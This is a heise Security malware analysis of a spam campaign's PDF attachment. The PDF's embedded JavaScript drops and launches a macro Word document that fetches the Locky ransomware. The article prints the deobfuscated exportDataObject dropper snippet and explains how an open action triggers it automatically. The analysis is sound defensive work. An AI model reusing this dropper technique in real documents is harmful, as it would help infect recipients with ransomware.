Can ePUBs or PDFs contain viruses?

Analyzed: old scam, new packaging - infection through PDFs

Manipulated Word documents are popular with criminals for infecting computers with malware. That PDF files can also carry executable code has somewhat slipped from memory. A recent spam campaign is a good occasion to refresh that awareness with a fresh sample.

In the recent past, several sources reported growing waves of attacks using prepared PDFs as e-mail attachments. If a victim on Windows falls for the mail and opens the PDF, the machine ends up, via a detour, with the ransomware Locky or Jaff. Essentially, this infection route is a well-known scam in new "packaging". I opened the case and looked at how the malware gets onto computers.

Fake payment reminder

The subject line of this spam campaign typically contains the term "Receipt", "Payment" or "Invoice", followed by an arbitrary sequence of digits. The file name picks up that numbering, as the example PDF "001_9018.pdf" I examined shows. A reader kindly sent me this sample.

For the analysis I use the handy tool PDF Stream Dumper, which was developed specifically for examining potentially malicious PDFs. To be on the safe side, I run it in a VM. A quick look reveals embedded JavaScript. At first glance the code looks quite extensive, but only two functions are actually involved in initiating the malware infection.

The rest of the code serves only as camouflage and comes from an application for managing weather data and a hacker script with the tasteful name "Smack my Bitch up". The relevant code is spread over three different places in the roughly 200-line script and looks like this:

function ser2mis() {
    return 'exportDataObject';          // the Acrobat API method name, hidden in a string
};

var absheder = ser2mis();
var firgi = 2;                           // nLaunch value: save to a temporary path and launch
var WeatherCtrlFocus = this[absheder];   // this["exportDataObject"], resolved at runtime

function stdoutS() {
    WeatherCtrlFocus({
        cName: "LAMIKSJZ.docm",          // the embedded data object to extract
        nLaunch: firgi
    });
};

The awkward naming obviously serves to obscure things further. The whole thing boils down to a single call of exportDataObject with the two parameters shown.

The function targets Adobe's Acrobat and Acrobat Reader, but other PDF readers also "understand" this command.

Piggyback malware

In terms of functions, the masterminds behind the PDF campaign stick to Adobe's specification for handling JavaScript in PDF applications. The Acrobat JavaScript Scripting Reference documents that one parameter receives the name of the data object to be extracted.

In this case the name is "LAMIKSJZ.docm". This is a Word document with macros. About the other parameter I learn from Adobe's documentation that the extracted Word file is saved to a temporary path and then executed, after an Acrobat security warning has appeared. If you close Acrobat Reader, the temporary copy of the Word file is automatically deleted.

Anyone familiar with JavaScript will have noticed that code execution in our example still requires the function contained in the code to be called. To see where the call to this function is hidden, I use PDF Stream Dumper to look at the PDF's so-called "Catalog Dictionary". Put simply, it describes the structure of the file by means of the object hierarchy. Here is a relevant excerpt:


One dictionary entry is interesting: according to Adobe's description, it can be used to perform an action automatically as soon as a PDF document is opened. I find the action to be carried out in the form of the "Action Dictionaries" anchored in the PDF. Et voilà: there is the call we were looking for.

Nice try ...

Now that it is clear how the trick with the Word document inside the PDF works, I run it once more in Adobe Reader for the sake of completeness. As expected, the Word document is extracted and opened in an AppData subfolder of the Windows user only after the security notice has been clicked through. The PDF also contains the sentence "Please open attached LAMIKSJZ.docm file", which may strike some recipients as odd because of the file name and the grammar.

In the Word document, everything proceeds as usual with macro viruses: to activate the VBA code it contains, a victim must first leave Word's "Protected View". Then they must also consent to the execution of macros. Only then does the macro download the payload, Locky, and the actual infection follows.

I conclude that a successful attack with a PDF/.docm combination would require clever social engineering, and my sample clearly lacks that persuasiveness. Essentially, the masterminds trip themselves up with the warning in Acrobat Reader; this extra hurdle could spare a victim the infection.

For safety's sake, you should not blindly open every PDF that arrives by e-mail. Because PDFs can in general carry executable code, this file format deserves caution regardless of which application you open it with. (of)

Analyzed - the series on heise Security

In the heise Security series "Analyzed:", experts look behind the scenes of current malware, fraud schemes and other tricks designed to rob you of your data.

https://heise.de/-3722708